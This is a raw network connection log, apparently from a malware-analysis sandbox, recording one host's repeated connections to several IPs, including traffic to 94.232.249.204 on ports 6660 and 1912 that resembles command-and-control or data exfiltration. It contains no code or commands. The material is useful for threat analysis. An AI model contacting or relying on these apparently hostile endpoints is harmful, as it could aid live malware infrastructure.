Jul 6, 2024 13:27:25.863404036 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863500118 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863511086 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863521099 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863533020 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863539934 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.863567114 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.863715887 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863727093 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863737106 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863749027 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863760948 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.863771915 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863780022 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.863794088 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863837957 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.864381075 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864392042 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864403009 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864425898 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.864501953 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864511967 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864521980 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864532948 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864542007 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.864558935 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.864691973 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864701986 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864712000 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864723921 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864732981 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.864744902 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.864757061 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.864778996 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.864845991 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865266085 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865284920 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865294933 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865325928 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.865339994 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.865411043 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865421057 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865431070 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865457058 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.865570068 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865580082 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865591049 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865601063 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.865611076 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865626097 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.865741014 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865751982 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865761995 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.865772963 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.865797043 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.866281033 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866302013 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866313934 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866337061 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.866417885 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866457939 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.866481066 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866492987 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866503954 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866524935 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.866596937 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866606951 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866617918 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866630077 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866638899 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.866650105 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.866683006 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866693974 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.866728067 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.867194891 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.867204905 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.867247105 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.867260933 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.872251034 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.914648056 CEST	443	49765	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.916379929 CEST	49765	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.916399956 CEST	443	49765	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:26.050488949 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.055460930 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:26.055718899 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.055756092 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.060558081 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:26.063711882 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.068625927 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:26.241148949 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:26.241192102 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:26.241357088 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:26.785182953 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:26.785711050 CEST	80	49766	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:26.785754919 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.788636923 CEST	49766	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.861366034 CEST	443	49765	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:26.861442089 CEST	443	49765	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:26.861496925 CEST	49765	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:26.861802101 CEST	49765	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:26.876889944 CEST	49768	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:26.876921892 CEST	443	49768	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:26.876995087 CEST	49768	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:26.877337933 CEST	49768	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:26.877347946 CEST	443	49768	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:26.893939972 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.898888111 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:26.898942947 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.898973942 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.903827906 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:26.903873920 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:26.908788919 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:27.099267006 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:27.099292040 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:27.522389889 CEST	443	49768	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:27.530134916 CEST	49768	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:27.530152082 CEST	443	49768	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:27.707406044 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:27.707498074 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:27.708857059 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:27.708863020 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:27.709069014 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:27.757757902 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:27.769922972 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:27.770899057 CEST	80	49769	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:27.770948887 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:27.772838116 CEST	49769	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:27.804491043 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:27.878104925 CEST	49770	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:27.885690928 CEST	80	49770	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:27.885771036 CEST	49770	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:27.885797977 CEST	49770	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:27.890620947 CEST	80	49770	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:27.890707016 CEST	49770	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:27.895559072 CEST	80	49770	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:27.959079027 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:27.959141016 CEST	443	49767	149.154.167.220	192.168.2.4
Jul 6, 2024 13:27:27.959196091 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:28.101990938 CEST	443	49768	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:28.102061987 CEST	443	49768	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:28.102137089 CEST	49768	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:28.102582932 CEST	49768	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:28.148092985 CEST	49771	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:28.148114920 CEST	443	49771	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:28.148186922 CEST	49771	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:28.148464918 CEST	49771	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:28.148478985 CEST	443	49771	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:28.597379923 CEST	80	49770	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:28.599155903 CEST	80	49770	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:28.599205017 CEST	49770	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:28.600785017 CEST	49770	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:28.706388950 CEST	49772	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:28.711265087 CEST	80	49772	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:28.711512089 CEST	49772	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:28.711553097 CEST	49772	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:28.716371059 CEST	80	49772	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:28.716425896 CEST	49772	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:28.721648932 CEST	80	49772	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:28.999854088 CEST	443	49771	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:29.005172968 CEST	49771	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:29.005191088 CEST	443	49771	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:29.218379974 CEST	49767	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:27:29.420284986 CEST	80	49772	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:29.420949936 CEST	80	49772	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:29.421081066 CEST	49772	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:29.427396059 CEST	49772	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:29.534544945 CEST	49773	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:29.539515972 CEST	80	49773	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:29.539721966 CEST	49773	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:29.539773941 CEST	49773	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:29.544702053 CEST	80	49773	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:29.544754982 CEST	49773	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:29.549549103 CEST	80	49773	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:29.560674906 CEST	443	49771	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:29.560735941 CEST	443	49771	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:29.560775995 CEST	49771	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:29.561115026 CEST	49771	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:29.574498892 CEST	49774	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:29.574516058 CEST	443	49774	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:29.574578047 CEST	49774	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:29.574836969 CEST	49774	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:29.574848890 CEST	443	49774	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:30.230743885 CEST	443	49774	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:30.232413054 CEST	49774	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:30.232431889 CEST	443	49774	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:30.287144899 CEST	80	49773	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:30.287478924 CEST	80	49773	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:30.287522078 CEST	49773	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:30.290977955 CEST	49773	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:30.547595024 CEST	49775	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:30.552628994 CEST	80	49775	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:30.552700043 CEST	49775	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:30.555666924 CEST	49775	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:30.560461998 CEST	80	49775	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:30.560511112 CEST	49775	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:30.565473080 CEST	80	49775	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:30.800792933 CEST	443	49774	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:30.800853968 CEST	443	49774	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:30.800929070 CEST	49774	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:30.801758051 CEST	49774	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:30.827760935 CEST	49776	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:30.827795029 CEST	443	49776	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:30.827953100 CEST	49776	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:30.828257084 CEST	49776	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:30.828274012 CEST	443	49776	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:30.884305954 CEST	49777	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:30.889244080 CEST	6660	49777	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:30.889317036 CEST	49777	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:30.998665094 CEST	49777	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:31.003561974 CEST	6660	49777	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:31.268838882 CEST	80	49775	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:31.269629002 CEST	80	49775	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:31.269722939 CEST	49775	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:31.273442030 CEST	49775	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:31.378386021 CEST	49778	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:31.385344982 CEST	80	49778	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:31.385406017 CEST	49778	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:31.385483027 CEST	49778	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:31.391660929 CEST	80	49778	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:31.391784906 CEST	49778	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:31.396552086 CEST	80	49778	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:31.443556070 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:31.448474884 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:31.451719046 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:31.461271048 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:31.466160059 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:31.486921072 CEST	443	49776	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:31.489192963 CEST	49776	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:31.489223003 CEST	443	49776	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:32.036021948 CEST	443	49776	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:32.036086082 CEST	443	49776	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:32.036216974 CEST	49776	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:32.036659002 CEST	49776	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:32.083092928 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:32.114167929 CEST	80	49778	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:32.114449024 CEST	80	49778	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:32.114511967 CEST	49778	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:32.118947983 CEST	49778	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:32.235661030 CEST	49780	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:32.235714912 CEST	443	49780	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:32.236851931 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:32.236897945 CEST	49780	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:32.239619970 CEST	49780	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:32.239635944 CEST	443	49780	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:32.251128912 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:32.255970001 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:32.387006998 CEST	49781	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:32.391879082 CEST	80	49781	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:32.391962051 CEST	49781	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:32.392018080 CEST	49781	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:32.398468971 CEST	80	49781	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:32.399223089 CEST	49781	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:32.404031992 CEST	80	49781	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:32.441154957 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:32.531440020 CEST	6660	49777	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:32.531717062 CEST	49777	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:32.549360991 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:32.874403000 CEST	443	49780	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:32.879981995 CEST	49780	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:32.880003929 CEST	443	49780	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:33.134685040 CEST	80	49781	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:33.134927034 CEST	80	49781	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:33.134978056 CEST	49781	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:33.139667034 CEST	49781	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:33.253549099 CEST	49782	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:33.258424044 CEST	80	49782	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:33.258544922 CEST	49782	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:33.258668900 CEST	49782	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:33.263436079 CEST	80	49782	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:33.263577938 CEST	49782	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:33.268429995 CEST	80	49782	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:33.453829050 CEST	443	49780	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:33.453902006 CEST	443	49780	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:33.453958988 CEST	49780	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:33.454483986 CEST	49780	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:34.017215014 CEST	80	49782	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.017230988 CEST	80	49782	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.017312050 CEST	49782	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.021478891 CEST	49782	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.128432035 CEST	49783	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.133333921 CEST	80	49783	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.133399963 CEST	49783	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.133469105 CEST	49783	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.138341904 CEST	80	49783	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.138387918 CEST	49783	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.143220901 CEST	80	49783	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.881057024 CEST	80	49783	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.881263018 CEST	80	49783	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.881653070 CEST	49783	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.885143995 CEST	49783	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.987658024 CEST	49784	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.992505074 CEST	80	49784	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:34.995440960 CEST	49784	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:34.995620012 CEST	49784	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:35.000349998 CEST	80	49784	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:35.000462055 CEST	49784	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:35.005218029 CEST	80	49784	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:36.742166996 CEST	80	49784	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:36.742615938 CEST	80	49784	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:36.743098974 CEST	49784	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:36.747680902 CEST	49784	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:36.847058058 CEST	49785	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:36.851876020 CEST	80	49785	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:36.852022886 CEST	49785	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:36.852022886 CEST	49785	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:36.856854916 CEST	80	49785	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:36.857055902 CEST	49785	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:36.861835957 CEST	80	49785	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:37.533895969 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:37.538779020 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.582874060 CEST	80	49785	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:37.583339930 CEST	80	49785	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:37.583389997 CEST	49785	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:37.586261034 CEST	49785	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:37.690743923 CEST	49786	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:37.697057962 CEST	80	49786	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:37.697127104 CEST	49786	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:37.697215080 CEST	49786	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:37.705008030 CEST	80	49786	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:37.705058098 CEST	49786	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:27:37.712224960 CEST	80	49786	188.114.96.3	192.168.2.4
Jul 6, 2024 13:27:37.717269897 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.717338085 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.717346907 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.717384100 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:37.717396975 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.717412949 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.717423916 CEST	1912	49779	94.232.249.204	192.168.2.4
Jul 6, 2024 13:27:37.717437029 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:37.717461109 CEST	49779	1912	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:37.857737064 CEST	49777	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:27:37.858324051 CEST	49787	6660	192.168.2.4	94.232.249.204
